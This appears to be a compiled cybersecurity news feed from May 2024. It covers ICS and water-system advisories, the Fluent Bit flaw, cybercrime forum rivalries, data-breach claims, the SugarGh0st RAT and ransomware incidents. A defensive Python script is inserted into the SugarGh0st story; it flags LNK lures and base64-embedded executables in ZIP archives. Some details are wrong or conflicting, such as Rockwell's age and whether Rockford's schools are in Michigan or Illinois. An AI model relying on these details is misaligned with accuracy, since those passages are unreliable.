Rockwell Automation is a major provider of ICS products that has been in business for nearly a decade. Headquartered in Milwaukee, Wisconsin, the industrial automation giant provides services for Architecture and Software segments meant for controlling customers' industrial processes, as well as Industrial Control Product Solution segments such as intelligent motor control, industrial control products, application expertise, and project management capabilities. "Due to heightened geopolitical tensions and increased adversarial cyber activity globally, Rockwell Automation is issuing this notice urging all customers to take immediate action to assess whether they have devices facing the public internet and, if so, to urgently remove that connectivity for devices not specifically designed for public internet connectivity," Rockwell Automation stated.

Rockwell Automation Discourages Remote Connections to ICS

In its latest security advisory, Rockwell Automation stressed that network defenders should never configure ICS devices to allow remote connections from systems outside the local network. It advised organizations that disconnecting these systems from the public-facing internet could significantly reduce their attack surface. This prevents threat actors from gaining direct access to vulnerable systems that may not yet have been patched against security vulnerabilities, thus protecting internal networks from potential breaches. Rockwell Automation has also cautioned customers to implement the necessary mitigations against several security vulnerabilities in its ICS devices. These vulnerabilities, identified by their CVE IDs, span several Rockwell products, including Logix Controllers, Studio 5000 Logix Designer, and FactoryTalk platforms. The list of these vulnerabilities is as follows:
  • CVE-2021-22681: Rockwell Automation Logix Controllers (Update A)
  • CVE-2022-1159: Rockwell Automation Studio 5000 Logix Designer
  • CVE-2023-3595: Rockwell Automation Select Communication Modules
  • CVE-2023-46290: Rockwell Automation FactoryTalk Services Platform
  • CVE-2024-21914: Rockwell Automation FactoryTalk View ME
  • CVE-2024-21915: Rockwell Automation FactoryTalk Service Platform
  • CVE-2024-21917: Rockwell Automation FactoryTalk Service Platform

Broader Efforts and Mitigation Actions for ICS Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also issued an alert advising Rockwell customers to implement the recommended security measures, as these products are in use at several critical infrastructure organizations across the country. Earlier, in September 2022, the agency along with the NSA had issued recommendations and a "how-to guide" for reducing exposure across ICS and related operational technologies. The urgency of enhancing ICS security is further highlighted by the collaborative efforts of multiple U.S. federal agencies, including the NSA, FBI, and CISA, along with cybersecurity agencies from Canada and the U.K. These agencies have previously issued several public statements about the threats posed by hacktivists targeting critical infrastructure operations through unsecured OT systems. CISA has already recommended defensive measures for industrial control systems such as minimizing network exposure, isolating control system networks, and securing remote access through the use of Virtual Private Networks (VPNs). The present administration also issued the 2021 national security memorandum instructing CISA and NIST to develop cybersecurity performance goals for critical infrastructure operators, as part of broader initiatives in recent years to secure critical infrastructure within the United States.

EPA Steps Up Enforcement to Protect US Drinking Water from Cyber Attacks

By: Alan J
21 May 2024 at 10:04

Environmental Protection Agency Water Systems

The U.S. Environmental Protection Agency (EPA) issued a stern warning on May 20th, 2024, highlighting the escalating cyber threats to the nation's drinking water systems and outlining stricter enforcement measures to protect water-related critical infrastructure. The EPA is an independent U.S. agency responsible for protecting human health and the environment. These responsibilities include making sure that Americans have clean air, land and water, and overseeing the implementation of federal laws related to these matters. The alert comes as part of a wider government initiative to strengthen national security and address vulnerabilities in critical infrastructure.

Environmental Protection Agency Concerned By Recent Inspection Results

Recent EPA inspections have revealed alarming cybersecurity gaps in a majority of water systems. More than 70% of inspected systems were found to be non-compliant with the Safe Drinking Water Act, with some exhibiting severe weaknesses such as unchanged default passwords and single logins. These weaknesses leave systems susceptible to cyberattacks, which the agency has observed becoming increasingly frequent and severe. In response to the escalating threat, the EPA is ramping up its enforcement activities under the Safe Drinking Water Act. This includes increasing the number of inspections, initiating civil and criminal enforcement actions where necessary, and ensuring that water systems adhere to the requirements for risk assessment and emergency response planning. The EPA is also working closely with federal and state partners, including the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, to fortify the nation's water systems against cyber threats. This collaboration includes providing technical assistance, guidance, training, and resources to help water systems implement crucial security measures. "Defending our nation's water supply is central to our mission at the EPA," emphasized Deputy Administrator Janet McCabe. "We are leveraging all available tools, including enforcement, to shield our water from cyber threats." The alert reflects the current government's commitment to addressing the urgency of cyber threats to critical infrastructure and ensuring that water systems are adequately equipped to counter these risks to public health.

EPA's Key Recommendations for Water Systems

The EPA's enforcement alert warned that cyberattacks on water systems could have devastating consequences, potentially disrupting treatment, distribution, and storage of water, damaging critical infrastructure, and even manipulating chemical levels to hazardous amounts. The alert added that small water systems are not exempt from this threat, as recent attacks by nation-state actors have targeted systems of all sizes. The EPA, Cybersecurity and Infrastructure Security Agency (CISA), and the FBI strongly recommend that water systems implement the following cybersecurity measures:
  • Reduce exposure to the public-facing internet.
  • Conduct regular cybersecurity assessments.
  • Immediately change default passwords.
  • Conduct an inventory of operational technology (OT) and information technology (IT) assets.
  • Develop and practice cybersecurity incident response and recovery plans.
  • Backup OT/IT systems.
  • Reduce exposure to vulnerabilities.
  • Conduct cybersecurity awareness training.
The EPA and CISA are offering free assistance to water systems to help them implement these crucial changes. Utilities can contact the EPA through its Cybersecurity Technical Assistance Form or email CISA Cyber Hygiene Services at vulnerability@cisa.dhs.gov with the subject line 'Requesting Cyber Hygiene Services'.

[Image: Environmental Protection Agency Water Systems EPA. Source: epa.gov]

The EPA's heightened enforcement measures reflect the urgency of the threat facing the nation's water systems. By working together with federal and state partners and implementing the recommended security practices, water systems can significantly enhance their resilience and protect this critical resource from malicious threat actors.

'Linguistic Lumberjack' Vulnerability Affects Major Cloud Services

By: Alan J
21 May 2024 at 07:42

Linguistic Lumberjack

A critical security vulnerability (CVE-2024-4323), referred to as "Linguistic Lumberjack," has been found in Fluent Bit, a widely used logging and metrics utility employed within major cloud infrastructure services. Fluent Bit is an open-source, lightweight data collector and processor designed to handle large volumes of log data from various sources on Windows, Linux, and macOS. Its scalability and ease of use make it a preferred choice in cloud environments, and it sees at least 10 million daily deployments. The Linguistic Lumberjack vulnerability could potentially enable attackers to execute Denial of Service (DoS) attacks, disclose sensitive information, or even gain remote code execution (RCE) capabilities.

Linguistic Lumberjack Vulnerability

The Linguistic Lumberjack vulnerability stems from a heap buffer overflow flaw in Fluent Bit's built-in HTTP server, particularly in how it handles the /api/v1/traces endpoint. This endpoint enables administrators to configure how Fluent Bit handles its tracing and monitoring operations.

[Image: Fluent Bit Linguistic Lumberjack Major Cloud Services. Source: www.fluentbit.io]

However, due to a lack of proper validation of input types, sending non-string values (such as integers) in the "inputs" array of a request can lead to memory corruption. The code incorrectly assumes these values are valid MSGPACK_OBJECT_STRs. By intentionally passing integer values in the "inputs" array field, an attacker can trigger various memory corruption issues, including heap buffer overflows and crashes due to attempts to write to protected memory regions. In a controlled environment, Tenable researchers successfully exploited the vulnerability to trigger service crashes (DoS) and the leak of adjacent memory contents, which could include sensitive information in a real-life scenario. Under specific environmental conditions, attackers could even exploit the vulnerability to cause denial-of-service conditions or achieve remote code execution.

[Image: Linguistic Lumberjack Major Cloud Services. Source: www.fluentbit.io]

The Fluent Bit utility service is deeply integrated into major Kubernetes distributions from Amazon AWS, Google GCP, and Microsoft Azure. Beyond cloud providers, Fluent Bit is also relied upon by several major tech companies, including Cisco, VMware, Intel, Adobe, and Dell. The utility is also known to be used by several major cybersecurity companies.

Mitigation and Remediation

The critical memory corruption vulnerability was introduced in version 2.0.7 of Fluent Bit and exists up to version 3.0.3 of the software, released on April 27th 2024. The issue has been fixed in the main source branch of Fluent Bit, with the fix expected to be included in the upcoming version 3.0.4 release. For Linux, packages containing the fix are already available for download. For users unable to upgrade immediately, the researchers recommend reviewing existing access to Fluent Bit's monitoring API, restricting access to authorized users and services only, and disabling the endpoint if it is not in use. Organizations relying on cloud services known to use Fluent Bit are advised to reach out to their cloud provider to ensure timely updates or mitigations. The researchers notified major cloud providers of the bug on May 15, 2024, to allow them to initiate their own internal responses.

BreachForums Fallout: Secretforums Announces BF Ranks, USDoD Shares Update

By: Alan J
21 May 2024 at 03:47

Secretforums BreachNation BreachForums

Secretforums, a data leaks forum, announced that it would bestow former BreachForums members with ranks similar to those they had previously held on the seized forum. The BreachForums domain had recently been taken down in a joint law enforcement operation, with its main admin Baphomet reportedly being arrested. Since its seizure, several other individuals and groups have been vying for control and credibility over the displaced cybercriminal community.

Secretforums Admin Alleges Ex-BreachForums Admin Was Informer

While the veracity of these claims is unknown and doubted, the Secretforums admin and former owner of Blackforums stated his belief that Baphomet, the admin and owner of BreachForums following its previous takedown, was an informer to law enforcement. The Secretforums admin alleged that Baphomet had expressed strong interest in being involved with the infrastructure management of Blackforums and had been attempting to influence him towards setting up a bastion server to assist with logs and security issues.

[Image: Secretforums BreachNation USDoD Baphomet. Source: Secretforums Telegram]

The Secretforums admin claimed that the requests had never been fulfilled, with full access never having been granted to anyone, including the other admins of Secretforums, and that he was solely responsible for the forum's infrastructure and security. Additionally, the admin alleged that no logs were ever saved from either site aside from the email addresses, usernames and password hashes required for essential site functionality. The earlier allegations, along with the offer to grant similar roles to ex-BreachForums members, may be part of a concerted effort to gain traction among the seized forum's former members and contributors. The admin also cast doubt on the new admin ShinyHunters and their efforts to rebuild BreachForums through the use of older backups.

[Image: Telegram Secretforums Blackforums BreachForums. Source: Secretforums Telegram]

Through a message on the Secretforums Telegram channel, the admin directed ex-members to reach out to a specified handle with proof of their previous ranks, along with their Secretforums username, to receive similar ranks.

USDoD Shares Updates on 'Breach Nation' Details

In addition to the Secretforums development, the threat actor USDoD shared further details about his attempts to build Breach Nation in a long post on X (Twitter). The threat actor claimed that neither he nor Breach Nation were affiliated with BreachForums' staff.

[Image: Secretforums Breach Nation USDoD. Source: X.com (@EquationCorp)]

USDoD attempted to differentiate Breach Nation from BreachForums by stating that the new forum would not feature a porn section and would restrict itself to the upload of databases and leads as its primary focus, while not allowing the upload of files such as combos and stealer logs 'to ensure the best quality content'. Additionally, the site would be organized into "High-Quality Leaks" for databases originating from First World countries and "Secondary Leaks" for leaks stemming from other countries, with the leads section separated into its own category. The site would feature a threat intelligence section to facilitate discussion on the subject, as the threat actor felt there was a range of opportunities within the scope of the topic. USDoD stated that he was working on obtaining the CDN records from the defunct BreachForums, and cited the presence of a market, a functioning escrow system and a credit system as similarities to the old forum. However, he also mentioned additional changes that might occur, such as the option to use the credit system to boost ranks within the forum and the absence of categories such as software and cracking in the initial stages of the forum, where he would function as the sole administrator. The forum would initially be public with a clearnet domain, but would later shift to invite-only and also feature an alternate onion address.
These efforts on both Secretforums and Breach Nation to bolster forum development and appeal to former BreachForums members highlight the competition between cybercriminal forums, the underlying fear of forum compromise by law enforcement, and the recognition of the rank/credit system as a way to gain additional engagement by allowing contributors to build a reputation within the community.

Threat Actors USDoD and SXUL Claim 70 Million Rows of Sensitive Data in Alleged Prison Data Breach

By: Alan J
20 May 2024 at 10:19

Prison Data Breach LeakBase USDOD new

Threat actors USDoD and SXUL have claimed responsibility on LeakBase for an alleged major prison data breach compromising approximately 70 million rows of sensitive data linked to a criminal database. While no further details were shared about the specific prison(s) involved, the threat actor shared sample data allegedly stemming from the claimed breach.

Prison Data Breach Allegedly Includes Wide Array of Data

The prison data leak reportedly includes unique identification numbers, Social Security numbers, full names, dates of birth, birth states, physical features, home and alternate addresses, offense codes, offense dates, offense descriptions, court dispositions, conviction dates and dates of charges. The data had been shared in .csv format and is stated to be 3GB in size when compressed and 22GB uncompressed. The data is stated to span the years 2020 to 2024, and sample data purporting to be the details of at least three convicted individuals was shared.

[Image: Prison Data Breach USDoD. Source: X.com (@DarkWebInformer)]

While this marks the first time the threat actor USDoD has posted on LeakBase, the threat actor claimed they would use it only until they got their own forum active. USDoD had earlier announced the creation of a new leak forum, choosing to name it 'Breach Nation'. While the details of the attack and their alleged involvement are unknown, USDoD credited the threat actor SXUL for the prison data breach. In a later reply to the thread, he clarified that the breach stemmed from the United States.

USDoD Known to Target Government Related Data

The threat actor has frequently targeted government, defense/law-enforcement contractors and geopolitical entities, with most of his operations primarily focused on the United States, as seen during the #RaidAgainstTheUS campaign. The incidents in that two-day release campaign in February 2022 included a US Strategic Command database, a US Defense Technical Information Center database, an Army Special Operations Center of Excellence database, a US Central Command database, a U.S. Special Operations Command database, and a Lockheed Martin database. While believed to harbor pro-Russian ties or sympathies, he has denied any involvement with governments or political entities. This denial included a claim that he had refused an offer to sell compromised intel to the Iranian government after being approached by them. Interestingly, the threat actor named Russia, along with Iran, as among the nations he would refuse to target. USDoD is known to rely on social engineering techniques to break into high-profile agencies or entities, and his previous attacks have included the FBI's private partner InfraGard, the leak of Airbus data on the 22nd anniversary of the 9/11 attacks, NATO Cyber Center Defense, and CEPOL. USDoD has disclosed the use of tools such as ZoomInfo to identify and research targets as well as their importance within the military and defense sector. In the Airbus post, the threat actor also threatened attacks on Lockheed Martin, Raytheon and other defense contractors. Recently, the actor claimed attacks on entities such as the unconfirmed Chinese Communist Party data leak and Bureau Van Dijk (which has since been refuted); since then, the threat actor appears to be working on setting up their own content delivery network to host leak files as well as their own data leak forum.
While the prison data breach remains unconfirmed, the threat actor's previous involvement in high-profile social engineering attacks remains a cause for concern regarding future operations and claims, along with the potential consequences stemming from the alleged prison data leak.

University of Siena Cyberattack: LockBit Claims Responsibility, Sets Deadline

By: Alan J
20 May 2024 at 07:06

LockBit Attack on University of Siena

The University of Siena, a distinguished Italian academic institution established in 1240, is currently grappling with a significant cybersecurity incident. The LockBit 3.0 ransomware group has claimed responsibility for the attack that has disrupted multiple university services, leading to the temporary suspension of its systems. As one of Europe's oldest universities, Siena offers extensive programs in sciences, medicine, engineering, economics, and social sciences. In response to the crisis, the university has initiated recovery operations with the support of the Italian National Cybersecurity Agency (Agenzia per la Cybersicurezza Nazionale), although the involvement of LockBit has not yet been officially confirmed.

University of Siena Data Breach and Ransom Demand

According to the new LockBit 3.0 leak site, the group has allegedly exfiltrated 514 GB of sensitive data from the university's systems. Screenshots of the stolen data were shared on both the leak site and the group's Telegram channel. The stolen data reportedly includes financial documents, including:
  • Budgets detailing expenses by month from 2020 to 2024.
  • Board-approved documents regarding project and tender financing from 2022 to 2026, including funding amounts.
  • Documents related to extraordinary construction works, contractor appointments, and a €1.7 million budget allocation.
Confidential information, including:
  • Non-disclosure agreements for the upcoming WineCraft 2024 event.
  • Tender design contracts for 2023, including contract budgets.
  • Contractor's investment plan for 2022, encompassing expenses, rents, and the overall financial plan.
[Image. Source: LockBit leak site]

[Image: University of Siena LockBit Samples. Source: LockBit Telegram]

With a ransom deadline looming on May 28, the university is racing against time to deal with the consequences of the attack. Earlier, on May 10th, the University of Siena acknowledged the cyber attack on its website, informing the public about the suspension of several of its services due to a 'massive cyber attack by an international group of hackers.'

University's Response and Restoration Efforts

The website acknowledged that several of its services, including its website for international admissions, ticketing services, and payment management platforms, had been affected and were taken down as a preventative measure. The notice assured users that payments made prior to the attack had been registered, despite a temporary disconnect between the website's payment confirmation and application processing.

[Image: University of Siena Data Breach LockBit. Source: www.apply.unisi.it]

However, the notice also stated that the volume of assistance requests received from international candidates following the incident was overwhelming its staff. The notice advised students to refrain from sending multiple inquiries, promising to respond as soon as possible. The notice provided separate advice to candidates who had already paid university fees but had not submitted applications and to candidates who had submitted admission applications but had not yet paid their application fees. The site stated in bold that students in the above categories should avoid unnecessary contact with staff, while apologizing for the inconvenience caused. The attack on the University of Siena is one of the largest attacks claimed by the LockBit group since the recent disruption of its activities by a coordinated law enforcement takedown. The incident underscores the group's persistence in remaining active despite these operational challenges, and its continued ability to cause massive disruption to victims.

Threat Actor Chucky, Owner of LeakBase Claims Knowmad Mood Data Breach

By: Alan J
20 May 2024 at 04:40

Knowmad Mood Data Breach Chucky Leakbase

Chucky, the threat actor who owns the English-language cybercrime forum LeakBase, has leaked a database allegedly stolen from the Spanish IT services company Knowmad Mood. The Knowmad Mood data breach reportedly contains sensitive employee data.

Knowmad Mood, which recently rebranded from its earlier name atSistemas, was established in 1994 and provides consulting and software development services, with offices in Spain, Italy, Portugal, the United States, Morocco, the United Kingdom, and Uruguay. LeakBase is a data leak forum that gained popularity as an alternative venue for sharing hacked data, leaked databases and credentials following the 2023 BreachForums takedown.

Knowmad Mood Data Breach Stems from CRM System

The stolen data was allegedly exported from the company's CRM system, and Chucky shared screenshots to substantiate his claim of responsibility for the Knowmad Mood data breach. The screenshots appeared to reveal a cache of sensitive files, including HTML, Excel, and Word documents.

[Image: LeakBase post by threat actor Chucky on the Knowmad Mood data breach. Source: LeakBase Forum]

Further, a CSV file was shared that was stated to contain workplace information and performance metrics of employees, including fields such as names, email addresses, h.input, h.exit, effective h., STE, STE Percentage, and h.STE. The leaked data raises serious concerns about the security measures in place at Knowmad Mood and the potential impact on employees and customers.

The Cyber Express team has reached out to Knowmad Mood for further information or updates on the alleged data breach claims; however, no updates were received at the time of writing.

Earlier Activities of Threat Actor Chucky

The threat actor Chucky, admin of LeakBase, has previously operated under the names LeakBase, Sqlrip, and Chuckies on various underground forums. After the mid-March 2023 shutdown of BreachForums, the threat actor's own forum, LeakBase, started gaining traction among the cybercriminal community. Chucky had been a regular participant and contributor on BreachForums, sharing breached databases and selling admin/unauthorized access to websites, while also being the most active poster on their own LeakBase forum.

The threat actor had disclosed to Cyble researchers that their primary tactic involved a customized brute-forcing technique. While the researchers confirmed that the technique might be a plausible method behind the threat actor's data breach attacks, the full tactics, techniques, and procedures (TTPs) employed by the TA remained unconfirmed.

Chucky previously claimed responsibility for massive leaks from sources such as the Indian government's Swachh City initiative, OnePlus-Oppo & Realme (a data breach affecting users from Thailand), Gamekaking, and the American automotive digital marketing service Purecars.

SugarGh0st RAT Campaign Targets U.S. AI Experts

By: Alan J
17 May 2024 at 11:36

SugarGh0st Campaign Targets AI Experts

Researchers have identified a recent cyber espionage campaign by a China-linked threat actor dubbed "UNK_SweetSpecter," which aims to harvest generative artificial intelligence (AI) secrets from experts in the United States. The threat actor targets AI experts using a remote access trojan (RAT) called SugarGh0st. SugarGh0st infiltrates the systems of a highly selective list of AI experts from different verticals such as tech companies, government agencies and academic institutions.

The SugarGh0st RAT was originally reported in November 2023 but has been observed in only a limited number of campaigns. It is a custom variant of the Gh0st RAT, a tool first publicly attributed to a Chinese threat group in 2008. Researchers suspect that the threat actor UNK_SweetSpecter is likely of Chinese origin.

Spear-Phishing SugarGh0st Campaign Targets AI Experts

Proofpoint researchers discovered that the targets of this campaign were all connected to a leading US-based AI organization and were lured with distinct AI-themed emails. The infection chain began with a seemingly innocuous email from a free account, claiming to seek technical assistance with an AI tool. The attached zip file contained a shortcut file (LNK) that deployed a JavaScript dropper upon access. This dropper included a decoy document, an ActiveX tool for sideloading, and an encrypted binary, all encoded in base64. The infection chain ended with the SugarGh0st RAT being deployed on the victim's system and communication being established with the attacker's command and control server.

Analysis of the attack stages revealed that the group had shifted its C2 communications from an earlier domain to a new one, suggesting an intent to evade detection. While the malware itself is relatively unsophisticated in its attack chain, the targeted nature of the campaign against AI experts makes it significant, the researchers noted. The SugarGh0st RAT was previously used in targeted campaigns in Central and East Asia.
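A defensive triage routine for the delivery chain described above (an archive-delivered LNK leading to a JavaScript dropper that carries its components as base64), written here as an added example rather than code from the article or from Proofpoint's research; the lure archive, its member names and the payload bytes are all constructed inline for demonstration.

```python
"""Defensive triage for the LNK-in-ZIP / base64-in-JavaScript delivery chain.
Added example; the archive, its member names and the payload bytes below are
constructed for demonstration and are not real campaign artifacts."""
import base64
import io
import re
import zipfile

# Windows shell link (.lnk) files begin with HeaderSize 0x4C followed by the
# fixed LinkCLSID {00021401-0000-0000-C000-000000000046}.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# File-type magic used to label whatever a base64 blob decodes to.
MAGIC_BYTES = {
    b"MZ": "PE executable",
    b"PK\x03\x04": "ZIP archive",
    b"%PDF": "PDF document",
    b"\xd0\xcf\x11\xe0": "OLE2 document",
}

# Base64 runs of 200+ characters carry an embedded file, not a short string.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")

# Member types that can carry an inline dropper (the LNK itself may embed one).
SCRIPT_SUFFIXES = (".js", ".jse", ".vbs", ".hta", ".lnk")


def label_payload(data: bytes) -> str:
    """Name the decoded payload by its leading bytes."""
    for magic, name in MAGIC_BYTES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def triage_archive(archive: bytes) -> dict:
    """Inspect a ZIP attachment; return LNK members and base64-embedded payloads."""
    findings = {"lnk_members": [], "embedded_payloads": []}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            name = info.filename.lower()
            # Check content as well as extension: a renamed .lnk still has the header.
            if data.startswith(LNK_MAGIC) or name.endswith(".lnk"):
                findings["lnk_members"].append(info.filename)
            if not name.endswith(SCRIPT_SUFFIXES):
                continue
            for match in B64_RUN.finditer(data):
                blob = match.group(0)
                blob = blob[: len(blob) - len(blob) % 4]  # drop a dangling partial group
                try:
                    decoded = base64.b64decode(blob, validate=True)
                except ValueError:  # binascii.Error is a ValueError subclass
                    continue
                findings["embedded_payloads"].append(
                    (info.filename, len(decoded), label_payload(decoded)))
    return findings


def verdict(findings: dict) -> str:
    """Collapse findings into a triage level for an analyst or mail gateway rule."""
    labels = {label for _, _, label in findings["embedded_payloads"]}
    if findings["lnk_members"] and "PE executable" in labels:
        return "high"  # shortcut lure plus an embedded executable: the chain described
    if findings["lnk_members"] or findings["embedded_payloads"]:
        return "medium"
    return "low"


def build_sample_archive() -> bytes:
    """Constructed lure archive mirroring the described chain (not a real sample)."""
    fake_binary = b"MZ" + b"\x00" * 198           # stands in for the encrypted binary
    fake_decoy = b"%PDF-1.4 decoy " + b" " * 200  # stands in for the decoy document
    dropper_js = (
        b"var decoy = '" + base64.b64encode(fake_decoy) + b"';\n"
        b"var payload = '" + base64.b64encode(fake_binary) + b"';\n"
        b"// dropper logic intentionally omitted in this constructed sample\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AI_tool_question.lnk", LNK_MAGIC + b"\x00" * 60)
        zf.writestr("dropper.js", dropper_js)
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_archive(build_sample_archive())
    print(result)
    print("verdict:", verdict(result))
```

The same check can run on archives pulled from a mail gateway quarantine; a "high" verdict is the signal to block delivery and hand the sample to an analyst.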

Potential Motivations, Attribution and Context

Although direct attribution to a specific nation-state is challenging, researchers concluded that the presence of Chinese-language artifacts and the precise targeting of AI experts suggests a possible link to China-linked threat actors. The campaign also coincides with the U.S. government's efforts to restrict Chinese access to generative AI technologies. New regulations established by the Biden administration would likely restrict the export of AI models and their data to countries it deems hostile to U.S. interests, such as Russia, China, North Korea and Iran. The Chinese Embassy labeled the action economic coercion and unilateral bullying.

Earlier, in February, Microsoft reported observing Chinese, Russian, North Korean and Iranian threat actors attempting to leverage AI tools from big tech AI companies like OpenAI for their campaigns. The report indicated that Chinese threat actors used AI tools to boost their technical prowess, such as in the development of tools and phishing content, while Russian threat actors were observed researching satellite and radar technologies possibly related to the war in Ukraine.

With regulatory efforts aimed at restricting proprietary/closed-source AI models, researchers theorize that this campaign is likely an attempt by a China-affiliated actor to harvest generative AI secrets via cyber theft before the policies are enacted.

Threat Actor USDoD Announces Creation of β€˜Breach Nation’, Following BreachForums Take Down

By: Alan J
17 May 2024 at 07:22

USDoD Announces Creation Of BreachNation

The recent takedown of BreachForums by the FBI, in collaboration with international law enforcement agencies, marked a significant victory against cybercrime. Less than 24 hours after this major blow, however, the renowned threat actor known as USDoD announced plans to resurrect the forum's community, demonstrating the relentless nature of the cyber underworld.

BreachForums had long been a central marketplace for cybercriminals, facilitating the trade of stolen data and hacking tools. Its sudden removal from the dark web was a monumental achievement for law enforcement, akin to dismantling a major illicit market. However, the cybercriminal community's response was swift and defiant, as demonstrated by the claim made just a day later by ShinyHunters, one of the remaining administrators, that the site domain itself had been recovered. Alongside the possible domain recovery, USDoD separately pledged to rebuild and improve upon BreachForums through a new competing forum, promising a fresh beginning for the infamous community.

USDoD Announces Creation of Breach Nation Forum

In a bold statement following the takedown, USDoD assured the community that he had already been working on rebuilding BreachForums, promising that the forum's legacy and user data would be preserved. He emphasized his dedication to creating a new community, presenting the takedown not as the end but as an opportunity for a fresh start.

[Image: USDoD's announcement. Source: X.com (@EquationCorp)]

His announcement also detailed the allocation of resources and infrastructure to support the new forum. The new domains, breachnation.io and databreached.io, are set to launch on July 4, 2024, symbolically coinciding with Independence Day. This new community, dubbed "Breach Nation," aims to offer enhanced features and security.

[Image: USDoD on the creation of Breach Nation. Source: X.com (@EquationCorp)]

USDoD's vision for BreachForums 3.0 includes robust infrastructure, with separate servers to ensure optimal performance and security. He has assured the community that he is not driven by profit and aims to offer an upgraded member rank to the first 200,000 users as a token of goodwill. He acknowledged the challenges ahead, including potential opposition from law enforcement as well as possible competition from the BreachForums administrator ShinyHunters. He also addressed concerns about compromise within the forum's administration, stating that he would initially manage it alone to ensure security and build trust.

USDoD's Earlier Activities

USDoD's bold promise to create the new Breach Nation forum highlights the persistence of the cybercriminal underworld. The threat actor is a notable figure in the cybercriminal community and was previously known as NetSec on RaidForums. USDoD is known to employ sophisticated social engineering and impersonation techniques to penetrate secure systems. His activities included exposing data related to several high-profile organizations such as InfraGard, Airbus, the U.S. Army, NATO Cyber Center, and CEPOL. He also claimed responsibility for alleged data leaks from the defense contractor Thales as well as the Communist Party of China.

A CDN created by USDoD, first publicized around the time of the alleged China data leak, is stated to form part of the new domain's infrastructure and appears to be being reworked and moved to a new domain.

[Image: USDoD on the creation of Breach Nation. Source: X.com (@EquationCorp)]

While the potential impact of the new forum remains unclear, it may be a key development to watch in the ongoing struggle between law enforcement and cybercrime in the aftermath of the BreachForums domain seizure.

Norwegian National Cyber Security Centre Recommends Moving Away from SSLVPN and WebVPN

By: Alan J
17 May 2024 at 02:44

Norwegian National Cyber Security Centre Replacement of SSLVPN and WebVPN

The Norwegian National Cyber Security Centre (NCSC) has issued a recommendation advising organizations to replace SSLVPN and WebVPN solutions with more secure alternatives, citing the repeated exploitation of vulnerabilities in edge network devices that has allowed attackers to breach corporate networks in the past.

The NCSC, a sub-division of the Norwegian Security Authority, functions as Norway's primary liaison for coordinating national efforts to prevent, detect, and respond to cyber attacks, as well as providing strategic guidance and technical support to enhance the country's overall cyber security posture. This includes conducting risk assessments, disseminating threat intelligence, and promoting best practices in both the public and private sectors. The NCSC's guidance is aimed at enhancing the security posture of organizations, particularly those within critical infrastructure sectors, by advocating a transition to more robust and secure remote access protocols.

Replacement of SSLVPN and WebVPN With Secure Alternatives

The NCSC's recommendation is underpinned by the recognition that SSL VPN and WebVPN, while providing remote access over the internet via SSL/TLS protocols, have been repeatedly targeted due to inherent vulnerabilities. These solutions create an "encryption tunnel" to secure the connection between the user's device and the VPN server. The exploitation of these vulnerabilities by malicious actors has led the NCSC to advise organizations to migrate to Internet Protocol Security (IPsec) with Internet Key Exchange version 2 (IKEv2).

IPsec with IKEv2 is the NCSC's recommended alternative for secure remote access. This protocol encrypts and authenticates each packet of data, using keys that are refreshed periodically. While acknowledging that no protocol is entirely free of flaws, the NCSC believes that IPsec with IKEv2 significantly reduces the attack surface for remote access incidents, especially because it is less tolerant of configuration errors than SSLVPN.

The NCSC emphasizes the importance of initiating the transition without delay. Organizations subject to the Safety Act or classified as critical infrastructure are encouraged to complete the transition by the end of 2024, with all other organizations urged to finalize the switch by 2025. The recommendation to adopt IPsec over other protocols is not unique to Norway; other countries, including the USA and the UK, have endorsed similar guidelines, underscoring a global consensus on the enhanced security offered by IPsec with IKEv2. As a preventative measure, the NCSC also recommended the use of 5G from mobile devices or mobile broadband as an alternative in locations where an IPsec connection cannot be implemented.

Recommendation Follows Earlier Notice About Exploitation

Last month, the Norwegian National Cyber Security Centre issued a notice about a targeted attack campaign against SSLVPN products in which attackers exploited multiple zero-day vulnerabilities in Cisco ASA VPN devices used to power critical infrastructure facilities. The campaign had been observed since November 2023.

This notice, intended primarily for critical infrastructure businesses, warned that while the entry vector in the campaign was unknown, the presence of one or more zero-day vulnerabilities potentially allowed external attackers, under certain conditions, to bypass authentication, intrude into devices and grant themselves administrative privileges. The notice shared several recommendations to protect against the attacks, such as blocking access to services from insecure infrastructure, including anonymization services (VPN providers and Tor exit nodes) and VPS providers. Cisco released security updates to address these vulnerabilities.

The earlier notice also recommended that businesses switch from the SSLVPN/clientless VPN product category to IPsec with IKEv2, due to the presence of critical vulnerabilities in such VPN products regardless of the VPN provider. The NCSC recommends that businesses in need of assistance contact their sector CERT or MSSP.

Rockford Public Schools Restores Systems After Ransomware Attack

By: Alan J
17 May 2024 at 01:00

Rockford Public Schools Ransomware Attack Michigan

The Rockford Public School District in Michigan has successfully restored its systems after a ransomware attack caused significant disruption earlier this week, forcing the shutdown of its computer, email, and phone systems. The district acted swiftly to contain the Rockford Public Schools ransomware attack in order to ensure the safety of its students and staff, but the containment measures also forced it to resort to traditional pen-and-paper methods for schooling. A day after the incident, the district superintendent confirmed that the attack had been isolated and systems restored, indicating that students and staff could operate as normal.

Established in 1884, Rockford Public Schools is a prominent educational institution in Rockford, Illinois. With 45 schools catering to around 27,766 students, it spans portions of Kent County and serves parts of Plainfield, Algoma, Courtland, Cannon, Grattan, and Oakfield Townships. The district's consolidation in the late 1950s brought together several neighborhood school systems.

Systems Restored After Rockford Public Schools Ransomware Attack

On the morning of the incident, district leaders were alerted to computer system failures within the school district that disrupted its phone and internet services. While a vendor issue was initially suspected, it soon became clear that the district had been struck by a ransomware attack after ransom notes were discovered on various printers. Superintendent Steve Matthews promptly ordered the shutdown of all network connections, including Wi-Fi, to contain the threat. He anticipated that it would take at least a couple of days for the district to return to normal operations. The district's official website displayed emergency phone numbers for the various buildings within the district during the attack.

[Image: Rockford Public Schools emergency phone numbers. Source: rockfordschools.org]

